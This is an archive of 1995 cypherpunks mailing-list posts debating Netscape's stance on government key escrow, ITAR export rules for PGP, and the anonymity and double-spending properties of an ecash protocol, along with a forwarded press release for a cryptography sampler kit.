really base our policies on the assumption that this will actually
happen?  Will the American people stand by for such an unprecedented
invasion of privacy?

Some governments are capable of all kinds of evil restrictions on
products.  Is Netscape committed to building in provisions so that their
software won't access sites owned by Jews, so they can sell in Arab
countries?  Obviously they will draw a line somewhere.  I urge them to
consider the moral issues involved in endorsing Big Brother GAK systems
before accepting them as just another cost of doing business.

> I chair an industry group called the "Global Internet Project", with members
> from almost twenty companies, including companies from Asia and Europe. This
> was the central issue we all agreed upon this morning, and we are putting
> together a policy statement whose purpose is to educate lawmakers on the
> importance of quick resolution of this matter.

I am afraid that what the companies really want is global consistency.
That way they can use one set of policies for all countries, and no one
company can get a competitive advantage over others by producing stronger
privacy protections, because they will be forbidden by law to do so.
Whether the policies protect freedom and privacy or not is not really
relevant from this view.

If this is the way things develop, I predict that it will not be
acceptable to the general public.  Netscape more than anyone has seen
how much pressure can be brought through a public perception of weak
software security.  Our own brute force key hacks as well as the RNG
seed problems have well demonstrated that.  Do you think the same thing
won't happen, only far worse, if the government tries to force weak
software down people's throats?

I understand that Jeff has stated that Netscape is actually opposed to
GAK.  It would have been nicer to hear that from Jim Clark, in
unequivocal terms.  The overall tone of his message, as I have pointed
out above, is one of accommodation and compromise with government
restrictions on the rights of free citizens to communicate securely.
He almost seems to think that free strong crypto is already illegal.  I
think he needs to take a good hard look around and remember that he is
still a free citizen of the United States.  My guess is that he has
spent too much time in the company of law enforcement people.  He had
better start trying to understand the grass roots members of his market
if he wants to continue to succeed.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 3 Dec 1995 09:27:20 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C0EE0D.48A9@netscape.com>
Message-ID: <Pine.SUN.3.91.951202200809.12018A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Jeff Weinstein wrote:

> Black Unicorn wrote:

> > AT&T seems to have been suitably 'incentivized'
> > The receipt of government funding (in whatever guise) might be just as
> > powerful in this case.
> > 
> > To the outsider, it looks as if Netscape 'owes' the government.
> 
>   We do owe the government.  They have paid us for Servers and Clients
> that support Fortezza.  That is what we owe them.  The money that the
> NSA gave us for Fortezza is not very significant compared to what we
> are getting from commercial sources.

Obviously it was significant enough to take.  It was also a perfect 
opportunity for Netscape to express concerns about the future of the 
technology, which is in netscape's interest.  The astute deal maker would 
be happy to work with the NSA on his own terms.  Instead, it 
would appear that Netscape is working FOR NSA on their terms.


> > > We are actively lobbying in washington to get clarification of the
> > > current regulations so that we can provide the US version via an "export
> > > controlled" FTP or HTTP download.
> > 
> > With which firm?  Or have you made it an in-house effort?
> 
>   We have recently hired a government liason person to manage our policy
> discussions with the government.  He is one of the people that will be
> talking to congressional and white house representatives next week.
> I don't know if we have made use of any outside lobbying firms.

I'd be interested to know what a 'government liason person' is.  It 
sounds to me like an 'in house lobbist.'  There is an old joke in the 
beltway about in house lobbists.

I also would like to know why you are actively lobbying for 
'claification' rather than 'modification' of the current policy.

Netscape seems to be taking the position, "We'd love it if you'd let us 
do X, but we are happy to roll over for whatever."  and  "By the way, 
what is the rule on exporting software again?"

I am impressed that some effort is being made.  I think it in the form of 
'too little, too late.'  But hey, who am I?

> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 3 Dec 1995 12:41:42 +0800
To: tcmay@got.net (Timothy C. May)
Subject: a foot here, a foot there -- pretty soon your mouth is *really* full (was: Re:Netscape, Corporations, and GAK Support)
Message-ID: <v03003e03ace6ccb69873@[129.46.82.85]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:36 AM 11/30/95, Timothy C. May wrote:

>It's possible that Jim Clark--whose quotations I have not yet seen denied
>by Netscape--is merely naive on matters of mandated key escrow. It's
>possible that he hasn't given it much thought.

I watched him in acquisition mode once upon a time and I rather doubt this:
I imagine that he's giving this considerable thought (he has the time while
counting stacks of shares on his bed every night ;), watching this space
and letting the "petty officers" navigate through this reef for now. His
statements so far indicate nothing more to me than that he's just playing
his cards very close for now so as not to alienate anyone: this is what a
captain should be expected to do when the waters are potentially this
"dangerous." Why would/should he chop the Feds off at the knees until he
knows exactly which way _their_ smoke blows? They're still trying to figure
out what the hell we're up to, and if we can manage to stay ahead of their
lumbering giants (Freeh, et alia), it'll pretty much stay that way for a
long time.

Anyway, no policy statements coming from Netscape NOW can be a reliable
indicator of where they're going to be -- even in a year -- on crypto
policy or on the internal development. All we're seeing for the forseeable
future is trial balloons and other strategic positioning. I bet Jim's read
the Book of Five Rings...

> It's also possible that he
>sincerely is supportive of plans for Big Brother to have an "escrowed" copy
>of our conversations, diaries, travel plans, etc.

Jim may "appear" a tad "hawkish," but he's no dope. Look, a 70% share, even
with momentum behind it, can slim down mighty fast with bad choices and
lots of fast dogs at his heels and he knows it. Let me put it this way:
"the higher they sell, the faster they drop."

Tim, you're absolutely right that speaking out NOW (and directly at him) is
the surest way for him and others to have data on which to base their
future decisions. If there are other solutions for modules Netscape intends
to provide (like...NS2.0's Mail module + GAK vs a c-neutral Eudora with an
optional MOSS translation plug-in), then he'll lose market share
proportional to how much we scream about it in public (I'm doing daily
vocal exercises, just in case ;). If he makes enough bad choices, like
throwing his full weight behind GAK and other atrocities, he'll end up like
DigiCash *would* if they kept/keep the bank protocol hidden. I just refuse
to believe he hates his work that much. At the worst, I see a special
"gaak" version for the Feds, but I sure as hell wouldn't buy it (and I
bought my copy of Netscape).

It would be nice to hear from him here directly, though. One can only
tolerate so much pussyfooting around before one becomes snippy.

   dave

________________________________________________________________
"I prefer a _real_ whorehouse to The Theatre." --Dorothy Parker






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Cabeen <cabeen@netcom.com>
Date: Sun, 3 Dec 1995 11:28:14 +0800
To: cypherpunks@toad.com
Subject: Use of PGP as an export?
Message-ID: <2.2b7.32.19951203050924.002d163c@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I think this has been brought up before, but I could only find one reference
to it in the archives and it wasn't too helpful, so I'll ask again.  If a
university provided a copy of PGP for use on their unix machines and a
non-resident, non-citizen *used* the copy of PGP on the server, but did not
download it onto their own machine, but instead just ran PGP on the server
alone, would it be a violation of the ITAR?  My school is interested in
putting a copy of PGP on the university server and wants to know if they
should somehow restrict access to citizens and legal residents only.  Thanks.
_____________________________________________________________________________
Ted Cabeen                                                  cabeen@netcom.com
Finger for PGP Public Key                        secabeen@midway.uchicago.edu
"I have taken all knowledge to be my province."            cococabeen@aol.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 3 Dec 1995 13:36:14 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT:  ALICE'S ADDRESS REVEALED.
Message-ID: <199512030524.VAA24279@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


As I promised, I've now opened a channel so that anyone who wants to
can send Alice de 'nonymous email.  I can now be reached via
an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
address will get to me, and I will do my best to reply to you as well,
but I can't guarantee, anything.

And before I get attacked for wasting bandwidth, I've got a deal to 
make it all worthwhile. 

A temporary break from GAK talk ... a pointer to a truly HOT website.

Here's just a small sample of what you'll find there:

:|                  ELIMINATING LIMBO
:|
:| "So the pope eliminated Limbo, did you hear?" she says
:| "What?"
:| "You know the pope, right, well he eliminated Limbo..."
:| "When?"
:| "I don't know, a while ago."
:| "Well that means we're fucked..."
:| "You got it."
:| "What's Limbo for?"asks Jessica
:| "That's where all the people that were around before they had the 
:|  chance to get the word of christ get to go...and unbaptized babies 
:|  that die early..."
:|
:| "It's not as good as Heaven, but it beats the hell out of the other
:|  options."
:| "How can he just eliminate it like that?"
:| "Cause he's the pope..."

Check all of this out and MORE at the SCARED SACRED site.  You'll be 
able to read the pope's "LETTER TO ALL THE WOMEN OF THE WORLD".

:| "What he wrote a letter to all the women of the world? Man, his direct
:|  mail expenses must be huge!"
:| "Yeah the people in the Vatican are just freaking out..."

But you have to be running NETSCAPE.
(1.1....NOT 2.0....OR IT JUST WON'T WORK...)


Point your Navigators to       http://www.banffcentre.ab.ca/
     and then choose the     --> Media & Visual Arts Page <--
and then from there the           --> Artists Web, <--
  and then just look for          --> VELCRO RIPPER. <--


BE CAREFUL THOUGH IF YOU ARE PRONE TO EPILEPTIC ATTACKS!!!!
IF YOU ARE, CHOOSE THE DIRECT ENTRANCE AND ENTER THERE!!
               YOU HAVE BEEN WARNED!!!



Alice de 'nonymous ...               <an455120@anon.penet.fi>

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: btmoore@iquest.net (Benjamin T. Moore)
Date: Sun, 3 Dec 1995 10:40:38 +0800
To: cypherpunks@toad.com
Subject: Re: "Got a subpoena?"
Message-ID: <m0tM49q-00032oC@iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:09 PM 12/1/95 -0600, Al Thompson wrote:
>At 06:57 PM 11/30/95 -0500, JHupp@Gensys.Com wrote:
>
>>	And at that point, you shut down the remailer and log each and every 
>>bounce.
>>
>>	Now, they could get an order forcing you to run a remailer ~ but that 
>>would open up a whole new can of worms i.e. can you be forced, under 
>>court order, to commit a crime?
>  
>That's not how they do it.  They will tell you that unless you cooperate,
>you will
>be charged for the "crime" you have been committing.  Where do you think
>confidential informants come from?  They're just people who have been caught
>or set up by the cops, who are trying to save their own ass.
> 

There are times when all that can be said is Amen!!! Most of these people have
absolutely no clue to the way the government REALLY works! The feds will set
up a "little" fish in order to catch what they consider to be a "big" one.  Ask 
Randy Weaver! They weren't really after him... they were after the Aryan Nations.
They wanted Mr. Weaver to infiltrate for them... So they attempted to encourage
his enthusiasm... How? They set him up on a bogus gun charge... when that 
wasn't successful... They killed his family!

The problem is people still live under the mistaken notion that there are rules!
When the congress and the courts passed laws allowing the confiscation of 
property without due process and further allowed the proceeds from the sell of 
that property to fund the coffers of the agencies that took those properties, they
assured our descent into a totalitarian state. We are like the walking wounded,
soon to be the walking dead. We are dead and don't know it! Unless the tree of
Liberty is watered soon... it seems we are doomed!

        Benjamin T. Moore, Jr.
        btmoore@iquest.net
        (Jian #AJF IRChat)



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMD7YISAJOVFNaChAQGolwf+IBbGrWn5HvRwHpIuAu+GbVgOgIP3ZIyo
CVt8EgvoAiq11Qo6B/aRawGhwxgmLCEZWbFaW/QrHQTsOWspqPmKd8N0h5ZIhn73
c84NOxjXEOcOUHwtmGgDL5kK1hvaqClmTXG3DjmCVoYgXIbHm73JB1liKwGsHn2E
TXAT4jEDUp2wBWiDNc2/z2dPzPgm/l+0xwzLZYPNMkL2/vgCrfSVewwBKXmk1oDZ
lYysKonja02NgYWUy2Ujz9gr69kfriZgdz4SIO+mbakhbPBqJZUEQg8fwZnz8fgU
hRmFoVFudRPRn1qyU65tzLbGurpXT8hxYbWwv895qaDfLHdQ2IH0iQ==
=On3V
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 3 Dec 1995 10:40:05 +0800
To: cypherpunks@toad.com
Subject: Remind me why we're so mad at Netscape
Message-ID: <199512030233.VAA09146@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone please remind me what it is we're mad at Netscape about?
As far as I can tell it's some combination of the following offenses:

(a) - Jim Clark made a speech in which he revealed that he thought the
government would be a player in determining the way cryptography ends
up being deployed on the Internet.  He was quoted in the trade press,
but it was unclear exactly which words were actually his.  Asked to
clarify, he said that Netscape would implement mandatory government
access across its product line only if required to by law, but he
observed that things seem to be moving in that direction.  I share his
pessimism, unfortunately, unless we find a way to shift the winds.

(b) Netscape contracted with the government to produce a ``Fortezza''
version of their browser for government use.  They negotiated to get a
lot of money for this (maybe something like $5 million).  Good for
them.  Personally, I *like* the Fortezza interface; the API seems to
provide a good abstraction for hardware and software crypto, it's easy
to replace the module with something else (like software 3DES with no
key escrow), and it's easy to defeat the key escrow features.  Of
course, maybe I'm just defending them out of guilty self-interest
here, since I've played around with the Fortezza interface quite a bit
myself, although they never sent me my $5 million.

(c) No one from Netscape attended Bernstein hearing.  I wish someone
had let me know beforehand that that was to be the litmus test for the
right to claim cryptographic correctness, or I would have flown right
out.  I guess I blew it, too.

(d) Their stock price is very high, many times greater than their
profits and physical assets would seem to justify.  I'm not sure I
understand the implication here.  Maybe that this is proof that in
exchange for selling out (by committing sins (a), (b) and (c), above),
the secret NSA stock-price-manipulation cabal rigged the market to
overvalue their stock?  Wow.

Don't get me wrong here; it may be useful to make clear that the market
(to the extent that any of us can claim to represent any market they
would be interested in) won't tolerate vendors who put the government's
desires ahead of their customer's security needs.   But I have yet to
see any actual evidence that that's what's happened here, and I'd hate to
see Netscape loose a lot of good people who could go a long way toward
deploying real security on the net over something that turns out to have
been a false alarm.

Disclaimer: I'm employed full time by a soon-to-be-tri-vested major
player in the military industrial complex, and us sellouts like to
stick together.

-matt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 14:37:54 +0800
To: cypherpunks@toad.com
Subject: prototype slot-machine
Message-ID: <199512030623.WAA17815@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've written up a slot-machine thing for ecash, very
experimental, very buggy, not very slick, (i'd like to get the
technical bugs worked out before i put a fancy wrapper on it) and i'd
*like* to announce it here for testing, but I'm worrying about
gambling laws.. 
	any thoughts?

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 1995 16:53:02 +0800
To: Hal <cypherpunks@toad.com
Subject: Re:  Info on Netscape's key escrow position
Message-ID: <ace670ba200210044091@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I say "Hear, Hear!" to Hal Finney's message about why we should be mad at
Netscape and Jim Clark.

(Although I still have a bit of hope that Netscape and Clark will see the
importance of not simply giving up.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sat, 2 Dec 1995 20:44:33 +0800
To: cypherpunks@toad.com
Subject: NSC Announce
Message-ID: <199512021234.XAA25640@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Thought this might be of interest....

From: ipSecure <ipsecure@ipower.nsc.com>
Subject: iPower home page/CryptoSampler announcement
Date: Fri, 01 Dec 95 15:53:55 PDT



For Immediate Release

Contact:  National Semiconductor
          Lori Sinton (408) 721-2448
          lori@ipower.nsc.com
          http://www.ipsecure.com


CryptoSampler, from National Semiconductor, Demonstrates Ease of
     Building Secure Electronic Commerce and Communications
                          Applications

   Company's iPower(tm) Business Unit Launches Free CryptoSolver
                   to Inaugurate New Web Site


SANTA CLARA, Calif., November 27, 1995 --- National Semiconductor
Corporation today announced the availability of its CryptoSampler
package for applications developers interested in gaining a "hands on"
understanding of how cryptography solves modern business problems.
Developed by National's iPower Business Unit, the program consists of
three demonstration applications and the PersonaCard(tm) 100, a
hardware token for personal, portable data security.

     The package contains both the demonstration applications
including  "build-it- yourself" tools to integrate security easily
into electronic commerce and communications applications. Priced at
$129, the CryptoSampler package is available to the first 1,000 U. S.
respondents and can be ordered directly from National's iPower
Business Unit.

     In a related move, the company's iPower Business Unit launched
its own web site along with CryptoSolver, an interactive game that
invites participants to solve encrypted messages based on the concepts
of substitution ciphers and the alphabetic frequency table.
CryptoSolver, a technology-teaser game rates players' deciphering
skills and can be downloaded from iPower's new web site free.

"As networks become the lifeblood of corporations and the principal
means of commerce, securing electronic transactions and proprietary
information over public and private networks is absolutely critical,"
said Tom Rowley, marketing director for National's iPower Business
Unit. "Through this program, we hope to help broaden individual's
understanding of how modern security technology can solve real
problems on the Internet and in Electronic Commerce business
applications," Rowley explained.

CryptoSampler Package - Token Plus Three Applications in One
------------------------------------------------------------

     The CryptoSampler package consists of a PersonaCard 100 data
security token, a floppy disk containing all three demonstration
applications, a cryptography primer written by recognized cryptography
expert Bruce Schneier, and a questionnaire. Customers who choose to
complete and return the questionnaire, will receive a free copy, while
supplies last, of Bruce Schneier's newly-released book, Applied
Cryptography, second edition.

o PersonaScreen(tm) System Lockout Utility is a screen locker that
  prevents unauthorized entry into a personal computer by locking the
  keyboard and mouse. The PersonaCard Token, implemented in the PC
  Card (formerly PCMCIA) Type II format, locks and unlocks the desktop
  computer.

o PersonaSecure(tm) Word Utility enables users to sign, seal (encrypt,
  decrypt), and verify documents as well as e-mail messages from
  within Microsoft Word 6.0 for Windows. Installed automatically,
  PersonaSecure displays a toolbar that corresponds to the functions
  of National's PersonaCard data security token. The hardware token
  incorporates RSA's industry-standard digital signature and
  encryption formats which are now "token aware." In addition to
  protecting and validating Microsoft Word documents, users can
  encrypt and decrypt e-mail messages with others who have installed
  the PersonaSecure Word Utility.

o PersonaDLL Library for Visual BASIC 3.0 is a Dynamic Link Library
  (DLL) of routines that enables developers to quickly and easily
  develop their own applications incorporating high-level data
  security features. PersonaDLL includes a Visual BASIC application,
  Visual BASIC source code, and access to all of the features of the
  PersonaCard 100 token including digital signatures, RSA key
  generation, encryption, and verification.

     System requirements to run the CryptoSampler package are:
Microsoft Windows 3.X, Windows for Workgroups 3.X, and a PC Card slot
(version 2.1 or later). Microsoft Word 6.0 is required for the
PersonaSecure Word Utility.


Pricing and Availability
------------------------
     The CryptoSampler package is available with or without a PC Card
Reader. For those who plan to run CryptoSampler applications on a
desktop or portable personal computer already equipped with a PC Card
slot, the basic package is offered at a special price of $129
(including handling and shipping). A CryptoSampler package with PC
Card reader is available for $199. The total retail value of the basic
package and configuration with card reader is $300 and $500,
respectively.

     To order  the CryptoSampler package in either configuration, call
1-800-272-9959 Ext# 631 between the hours of 7 AM and 7 PM Central
Standard Time.  To play CryptoSolver and for more information about
the CryptoSampler program, see the iPower web site at
http://www.ipsecure.com  .

iPower Security Solutions
-------------------------
     Introduced a year ago, iPower technology provides the
highest-level of commercially available security in a personal,
portable hardware token. iPower solutions are already being
incorporated by OEMs, ISVs, and VARs into a variety of applications
and hardware platforms including e-mail and messaging, electronic
commerce, network security, and secure access to on-line services
including the Internet.

National Semiconductor Corporation provides technologies for moving
and shaping information. The company focuses on four key areas -
communications, consumer, industrial, and personal systems. National
Semiconductor is headquartered in Santa Clara, California, and has
22,300 employees worldwide.

                              -30-

Note to Editors: To receive a CryptoSampler package for review, call
or e-mail Lori Sinton, 408 721-2448 or sampler@ipower.nsc.com

iPower and PersonaCard are trademarks of National Semiconductor
Corporation. All other trademarks are held by their respective
companies


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 3 Dec 1995 11:57:38 +0800
To: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Questions/Comments on ecash protocol
In-Reply-To: <199512030127.RAA03496@cory.EECS.Berkeley.EDU>
Message-ID: <Pine.SUN.3.91.951202223133.3336H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


thank you for the sterling analysis.  I for one am following this with 
enormous interest, even though some of the details are lost on me right now.

I can't recall if you were party to the earlier thread on "digital coin 
launderies", and I know some of it was off line.  I hope you will keep 
some of the following in mind as you go.

One of the major questions about digicash/MTB$ is whether and how money
might be laundered.  The question subsumes the following (among others): 

1) What information about Charlie/customer is encoded onto the coin? 
(There must be some, right, since the serial number is blinded?)  Since the
bank doesn't know what serial number it is signing, it needs to put info 
about Charlie onto the coin so that it can track him down if he double 
spends.  Lacking such info, the bank can refuse to honor a double-spent 
coin, but has no way to know who the double-spender is.

2) How does Charlie (customer) software store the coin internally?

3) Is there a way [how hard is it] for charlie to extract a coin and 
either 
   (i) copy it and/or 

   (ii) send it to David [3rd party] in such a way 
that David could insert it into David's MTB software and then spend it to 
Sam without Sam or the Bank noticing that anything was wrong.  If Charlie 
and David do this, David now has a coin that is from his point of view 
both payee and payor anonymous, although Charlie has a risk that David 
will double-spend and expose Charlie to the bank's wrath.

4) what information if any is encoded onto a coin when Charlie spends it 
to Sam?


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 14:58:45 +0800
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Getting a copy of the Jim Clark speech
In-Reply-To: <199512030120.CAA06452@utopia.hacktic.nl>
Message-ID: <199512030641.WAA19211@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> client profile, provided you are using Apache 0.8.x (I know sameer is). See
	Incorrect. We are running Apache 1.0.0

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 3 Dec 1995 15:07:54 +0800
To: cypherpunks@toad.com
Subject: Re:  Info on Netscape's key escrow position
Message-ID: <9512030656.AA22522@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Hal Finney:

[in regard to Jim Clark "preaching acquiescence"]: 
Where is the recognition that the right to tap communications is not granted by 
God but an accident of technology, one which can be taken away by technological 
progress as easily as it was granted?
..............................................................

I agree with Hal's comments.  If Netscape acquiesced to the use of GAK, it 
would be very easy for cypherpunks and others to switch browsers; they could 
re-direct interest to Mosaic or even create their own.

Netscape is in a prominent position, however, in the net community, which is 
looking to prevent government control of their electronic communication.  The 
NSA and other government agencies are looking for excuses to give their 
decisions the appearance of legitimacy.  Any perceived weakness on the part of 
the commercial key players in cyberspace can be perceived as conducive towards 
the implementation of mandatory security plans, in disregard of the actual 
desires of internet users.

It appears that Netscape is stuck between a rock and a hard place:  

.  if they adamantly resist GAK, they're in trouble with "the Law"
.  if they appear agreeable to complying with future legal mandates, they're in 
trouble in with their customers in cyberspace.

Losing the fight intellectually precedes losing it in fact.  This is more 
likely to result when the distinction between government "authority" vs citizen 
"rights" is obscured from the general consciousness (as in: whose business is 
it, anyway?).

Anyone who provides a communication service which can be made accessible to 
"the Law" becomes by default a representative of the issue, which to me amounts 
to what someone want to promote in the U.S. (or the world) in terms of ideals; 
in terms of a way of life.

It would promote an atmosphere of intellectual integrity to have explicitly 
definite statements about the objections to GAK, but barring that it is useful 
to know that these representatives appreciate why the difference is important.

.  is it because money is being lost?
.  because privacy is at stake?
.  because the ideal of self-determination is being muddled, along with
.  an understanding of where the concept of "individual unit citizens" stands 
in relation to concepts of "government authority"?
.  because of the consequences of that obfuscation?

The caution with which this GAK business is being dealt with I think is 
symptomatic of an underlying problem, which is of not having a sense of freedom 
to stand up to the Dark Side.

  ..
Blanc






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 15:47:22 +0800
To: nowhere@bsu-cs.bsu.edu (Anonymous)
Subject: Re: your mail
In-Reply-To: <199512030545.AAA01728@bsu-cs.bsu.edu>
Message-ID: <199512030732.XAA23416@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Competing with Netscape is obviously something that's easier said than
> done.  But we ought to consider the strategic importance of having robust,

	I hate to repeat myself, but sometimes people don't listen.
http://www.c2.org/apachessl/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 3 Dec 1995 14:14:12 +0800
To: Michael Froomkin <iang@cory.EECS.Berkeley.EDU>
Subject: Re: Questions/Comments on ecash protocol
Message-ID: <v02120d05ace6ea8784af@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:40 12/2/95, Michael Froomkin wrote:
>thank you for the sterling analysis.  I for one am following this with
>enormous interest, even though some of the details are lost on me right now.

[Well done, Ian!]

[...]

>1) What information about Charlie/customer is encoded onto the coin?

None.

>(There must be some, right, since the serial number is blinded?)  Since the
>bank doesn't know what serial number it is signing, it needs to put info
>about Charlie onto the coin so that it can track him down if he double
>spends.  Lacking such info, the bank can refuse to honor a double-spent
>coin, but has no way to know who the double-spender is.

Since an online clearing protocol is being used, the bank has no need to
identify double spenders. The bank will simply refuse to honor a double
spent coin. In fact, cancelling a payment in this protocol is done by just
depositing the coin yourself.

>3) Is there a way [how hard is it] for charlie to extract a coin and
>either
>   (i) copy it and/or
>
>   (ii) send it to David [3rd party] in such a way
>that David could insert it into David's MTB software and then spend it to
>Sam without Sam or the Bank noticing that anything was wrong.  If Charlie
>and David do this, David now has a coin that is from his point of view
>both payee and payor anonymous, although Charlie has a risk that David
>will double-spend and expose Charlie to the bank's wrath.

I can't help the feeling that I am missing something whenever you bring up
this question. Assuming it could be done. What would David gain? He as the
payor is anonymous to Sam either way. Sam still would have to be worried
about being identified, since if Charlie gives David access to Charlie's
wallet, it is safe to assume that Charlie will give David (and the mint)
access to his blinding factor. Which in turn would reveal Sam as the payee.

The protocol you suggest gives the parties exactly what they would have if
they just used Ecash "out of the box": full payor anonymity, no payee
anonymity. So why bother?

<insert standard disclaimer here>


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Sun, 3 Dec 1995 14:48:21 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: GAK, Netscape, CyberDog, and you.
Message-ID: <199512030737.BAA02145@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 1 Dec 1995 11:58:26 -0500
> To:            semper.fi@solutions.apple.com
> From:          rah@shipwright.com (Robert Hettinga)
> Subject:       GAK, Netscape, CyberDog, and you.
> Cc:            cypherpunks@toad.com, mcip@deepeddy.com, www-buyinfo@allegra.att.com,
>                ecm@ai.mit.edu, bsdc@ai.mit.edu

> I hear that with CyberDog, building a secure Netscape-compatible browser in
> OpenDoc is now pretty simple. That adding economically useful -- and

Where can one get more information on CyberDog?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 3 Dec 1995 17:02:53 +0800
To: cypherpunks@toad.com
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <ace5cd0216021004c8fd@[205.199.118.202]>
Message-ID: <30C162DD.1E2F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> I just get sick of those who tout themselves as Experts in Software
> Munitions and are in fact are merely in it for the cash.  In it for the
> cash is just fine.  Just don't tell me later you aren't.

  Can't I be a supporter of strong crypto, and also be in it for the money?
Many people here make good money off of crypto related work.  If I'm asked
to implement GAK in a situation where it is not mandated by law, I won't
do it.

> > I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal
> > on the actual issue of whether Netscape will build a U.S.-supported GAK (as
> > opposed to offering GAK for the Iraqis or French). I await with interest
> > the clarification of the anti-GAK stance that Jeff alluded to.
> 
> I believe you got it with:
> 
> "If the law requires GAK, then I believe that we will implement it rather
> than just disable encryption."

  Tim was referring to the position statement against GAK that we will be
releasing before the NIST meeting next week.

> Note that the phrase is entirely ambigious on whether this refers to the
> law requiring GAK for export, or export AND domestic sales.  Netscape
> will install GAK into whatever will increase its sales.  I understand
> and respect this position in the context of a company which needs
> badly to start raking in some profits.

  What I meant, and have said in other places, is that if it is legal to
ship a product without GAK for use inside the US, or anywhere else,
I believe we will do it, because that is what our customers want.

> The title "Software Munitions Expert" or similar such should probably be
